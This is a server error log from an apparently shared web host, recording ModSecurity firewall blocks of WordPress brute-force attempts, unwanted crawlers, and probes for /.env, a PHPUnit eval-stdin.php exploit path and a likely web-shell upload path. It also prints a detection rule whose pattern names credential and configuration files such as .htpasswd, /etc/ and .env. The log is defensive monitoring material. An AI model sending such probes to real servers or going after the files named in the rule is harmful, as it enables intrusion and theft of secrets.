[Tue May 26 13:58:40.729563 2026] [security2:error] [pid 555743:tid 555976] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZuMjqAquC0YaxQjDLmAAAAXE"]
[Tue May 26 13:58:40.994290 2026] [core:crit] [pid 560287:tid 560535] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:58:41.047246 2026] [security2:error] [pid 555743:tid 555919] [client 202.141.30.10:35501] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZucjqAquC0YaxQjDLoAAAATg"]
[Tue May 26 13:58:41.047370 2026] [security2:error] [pid 555743:tid 555919] [client 202.141.30.10:35501] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZucjqAquC0YaxQjDLoAAAATg"]
[Tue May 26 13:58:41.892182 2026] [security2:error] [pid 560287:tid 560462] [client 147.53.121.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVZuZmX5s6sDS3wJVcwvgAAAK8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1443956&moderation-hash=9164ad00ee6584c7e227ef699a9953b1
[Tue May 26 13:58:42.255301 2026] [core:crit] [pid 560287:tid 560548] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:58:42.547986 2026] [security2:error] [pid 560287:tid 560532] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZupmX5s6sDS3wJVcwwwAAAPI"]
[Tue May 26 13:58:42.986084 2026] [security2:error] [pid 560287:tid 560549] [client 129.222.147.134:51956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZupmX5s6sDS3wJVcwzgAAAQE"]
[Tue May 26 13:58:42.986273 2026] [security2:error] [pid 560287:tid 560549] [client 129.222.147.134:51956] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZupmX5s6sDS3wJVcwzgAAAQE"]
[Tue May 26 13:58:43.544042 2026] [security2:error] [pid 560287:tid 560476] [client 103.67.163.30:53321] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bramas.in"] [uri "/.env"] [unique_id "ahVZu5mX5s6sDS3wJVcw2QAAALw"]
[Tue May 26 13:58:43.952752 2026] [security2:error] [pid 560287:tid 560545] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZu5mX5s6sDS3wJVcw2AAAAP0"]
[Tue May 26 13:58:45.241387 2026] [security2:error] [pid 560287:tid 560526] [client 147.53.121.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVZvZmX5s6sDS3wJVcw8QAAAOw"], referer: https://anujtradingco.com
[Tue May 26 13:58:45.315690 2026] [security2:error] [pid 560287:tid 560496] [client 185.191.171.14:38692] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahVZvZmX5s6sDS3wJVcw9QAAAM8"]
[Tue May 26 13:58:45.315839 2026] [security2:error] [pid 560287:tid 560496] [client 185.191.171.14:38692] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahVZvZmX5s6sDS3wJVcw9QAAAM8"]
[Tue May 26 13:58:45.454124 2026] [security2:error] [pid 560287:tid 560478] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZvZmX5s6sDS3wJVcw7QAAAL4"]
[Tue May 26 13:58:46.327874 2026] [security2:error] [pid 560287:tid 560454] [client 103.67.163.30:59722] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bramas.in"] [uri "/.env"] [unique_id "ahVZvpmX5s6sDS3wJVcxAAAAAKc"]
[Tue May 26 13:58:47.947481 2026] [security2:error] [pid 560287:tid 560457] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZv5mX5s6sDS3wJVcxDgAAAKo"]
[Tue May 26 13:58:49.558419 2026] [security2:error] [pid 555743:tid 555961] [client 146.174.166.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZwcjqAquC0YaxQjDL3wAAAWI"]
[Tue May 26 13:58:50.307964 2026] [security2:error] [pid 560287:tid 560504] [client 8.219.112.217:45444] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "207.174.214.47"] [uri "/"] [unique_id "ahVZwpmX5s6sDS3wJVcxOgAAANY"]
[Tue May 26 13:58:50.738694 2026] [security2:error] [pid 555743:tid 555903] [client 103.67.163.30:59040] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "bramas.in"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVZwsjqAquC0YaxQjDL7QAAASg"]
[Tue May 26 13:58:50.949358 2026] [security2:error] [pid 560287:tid 560525] [client 202.141.30.10:35337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZwpmX5s6sDS3wJVcxVQAAAOs"]
[Tue May 26 13:58:50.949467 2026] [security2:error] [pid 560287:tid 560525] [client 202.141.30.10:35337] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZwpmX5s6sDS3wJVcxVQAAAOs"]
[Tue May 26 13:58:51.017694 2026] [security2:error] [pid 560287:tid 560439] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZwpmX5s6sDS3wJVcxQwAAAJo"]
[Tue May 26 13:58:52.357295 2026] [security2:error] [pid 560287:tid 560526] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZw5mX5s6sDS3wJVcxYgAAAOw"]
[Tue May 26 13:58:52.644915 2026] [security2:error] [pid 560287:tid 560483] [client 106.192.248.115:63712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZxJmX5s6sDS3wJVcxbgAAAMI"]
[Tue May 26 13:58:52.645036 2026] [security2:error] [pid 560287:tid 560483] [client 106.192.248.115:63712] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZxJmX5s6sDS3wJVcxbgAAAMI"]
[Tue May 26 13:58:53.027792 2026] [security2:error] [pid 560287:tid 560489] [client 129.222.147.134:53970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZxZmX5s6sDS3wJVcxeAAAAMg"]
[Tue May 26 13:58:53.027925 2026] [security2:error] [pid 560287:tid 560489] [client 129.222.147.134:53970] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZxZmX5s6sDS3wJVcxeAAAAMg"]
[Tue May 26 13:58:54.341241 2026] [security2:error] [pid 560287:tid 560454] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZxZmX5s6sDS3wJVcxhgAAAKc"]
[Tue May 26 13:58:56.501910 2026] [security2:error] [pid 555743:tid 555896] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZyMjqAquC0YaxQjDMGQAAASE"]
[Tue May 26 13:58:58.046781 2026] [security2:error] [pid 560287:tid 560520] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZyZmX5s6sDS3wJVcxsQAAAOY"]
[Tue May 26 13:58:58.396819 2026] [security2:error] [pid 555743:tid 555908] [client 191.101.157.243:60318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.157.101.191.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVZysjqAquC0YaxQjDMLgAAAS0"]
[Tue May 26 13:58:59.618242 2026] [security2:error] [pid 560287:tid 560542] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZy5mX5s6sDS3wJVcx1QAAAPo"]
[Tue May 26 13:59:00.148325 2026] [security2:error] [pid 555743:tid 555940] [client 46.105.48.30:12059] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "greattusker.com"] [uri "/robots.txt"] [unique_id "ahVZzMjqAquC0YaxQjDMRAAAAU0"]
[Tue May 26 13:59:00.148477 2026] [security2:error] [pid 555743:tid 555940] [client 46.105.48.30:12059] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "greattusker.com"] [uri "/robots.txt"] [unique_id "ahVZzMjqAquC0YaxQjDMRAAAAU0"]
[Tue May 26 13:59:01.300264 2026] [security2:error] [pid 555743:tid 555959] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZzMjqAquC0YaxQjDMUgAAAWA"]
[Tue May 26 13:59:01.846784 2026] [security2:error] [pid 555743:tid 555979] [client 202.141.30.10:35428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZzcjqAquC0YaxQjDMYQAAAXQ"]
[Tue May 26 13:59:01.846986 2026] [security2:error] [pid 555743:tid 555979] [client 202.141.30.10:35428] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZzcjqAquC0YaxQjDMYQAAAXQ"]
[Tue May 26 13:59:02.485904 2026] [security2:error] [pid 560287:tid 560434] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZzpmX5s6sDS3wJVcx9wAAAJU"]
[Tue May 26 13:59:03.374778 2026] [security2:error] [pid 560287:tid 560433] [client 129.222.147.134:55195] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZz5mX5s6sDS3wJVcyAwAAAJQ"]
[Tue May 26 13:59:03.374893 2026] [security2:error] [pid 560287:tid 560433] [client 129.222.147.134:55195] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZz5mX5s6sDS3wJVcyAwAAAJQ"]
[Tue May 26 13:59:04.551125 2026] [security2:error] [pid 560287:tid 560449] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ0JmX5s6sDS3wJVcyDAAAAKM"]
[Tue May 26 13:59:06.517807 2026] [security2:error] [pid 560287:tid 560421] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ0pmX5s6sDS3wJVcyNgAAAIg"]
[Tue May 26 13:59:07.921648 2026] [security2:error] [pid 555743:tid 555895] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ08jqAquC0YaxQjDMowAAASA"]
[Tue May 26 13:59:09.907906 2026] [security2:error] [pid 555743:tid 555839] [remote 157.55.39.49:54621] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVZ1cjqAquC0YaxQjDMvgABZl8"]
[Tue May 26 13:59:09.980509 2026] [security2:error] [pid 555743:tid 555966] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ1cjqAquC0YaxQjDMwwAAAWc"]
[Tue May 26 13:59:10.982034 2026] [security2:error] [pid 560287:tid 560305] [remote 152.53.111.131:39034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.111.53.152.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVZ1pmX5s6sDS3wJVcySwAA_RE"]
[Tue May 26 13:59:11.627282 2026] [security2:error] [pid 560287:tid 560533] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ15mX5s6sDS3wJVcyUAAAAPM"]
[Tue May 26 13:59:11.864960 2026] [security2:error] [pid 560287:tid 560304] [remote 216.185.214.209:54380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVZ15mX5s6sDS3wJVcyVwAAtBA"]
[Tue May 26 13:59:12.840276 2026] [security2:error] [pid 560287:tid 560509] [client 202.141.30.10:35337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZ2JmX5s6sDS3wJVcyZQAAANs"]
[Tue May 26 13:59:12.840411 2026] [security2:error] [pid 560287:tid 560509] [client 202.141.30.10:35337] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZ2JmX5s6sDS3wJVcyZQAAANs"]
[Tue May 26 13:59:13.329547 2026] [security2:error] [pid 560287:tid 560511] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ2JmX5s6sDS3wJVcyagAAAN0"]
[Tue May 26 13:59:13.684388 2026] [security2:error] [pid 560287:tid 560446] [client 129.222.147.134:63696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZ2ZmX5s6sDS3wJVcydAAAAKA"]
[Tue May 26 13:59:13.684565 2026] [security2:error] [pid 560287:tid 560446] [client 129.222.147.134:63696] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZ2ZmX5s6sDS3wJVcydAAAAKA"]
[Tue May 26 13:59:14.386801 2026] [security2:error] [pid 555743:tid 555971] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ2cjqAquC0YaxQjDM8gAAAWw"]
[Tue May 26 13:59:15.309308 2026] [security2:error] [pid 555743:tid 555972] [client 71.205.76.94:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ2sjqAquC0YaxQjDM_gAAAW0"]
[Tue May 26 13:59:17.825273 2026] [security2:error] [pid 560287:tid 560509] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ3ZmX5s6sDS3wJVcypwAAANs"]
[Tue May 26 13:59:18.595862 2026] [security2:error] [pid 560287:tid 560425] [client 213.136.78.252:42252] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVZ3pmX5s6sDS3wJVcytgAAAIw"]
[Tue May 26 13:59:20.127385 2026] [security2:error] [pid 555743:tid 555983] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ38jqAquC0YaxQjDNNgAAAXg"]
[Tue May 26 13:59:22.061594 2026] [security2:error] [pid 560287:tid 560499] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZ4ZmX5s6sDS3wJVcy5QAAANI"]
[Tue May 26 13:59:22.377711 2026] [security2:error] [pid 555743:tid 555809] [remote 95.216.117.13:40748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVZ4sjqAquC0YaxQjDNVQABZ0E"]
[Tue May 26 13:59:23.205815 2026] [security2:error] [pid 560287:tid 560310] [remote 209.42.19.17:53418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVZ45mX5s6sDS3wJVcy-gAAjBY"]
[Tue May 26 13:59:23.301782 2026] [security2:error] [pid 560287:tid 560355] [remote 152.53.111.131:41190] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.111.53.152.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVZ45mX5s6sDS3wJVcy_wAAn0I"]
[Tue May 26 13:59:23.462872 2026] [autoindex:error] [pid 560287:tid 560461] [client 184.154.36.162:40594] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.google.com/url?url=whitesun.in&yahoo.com
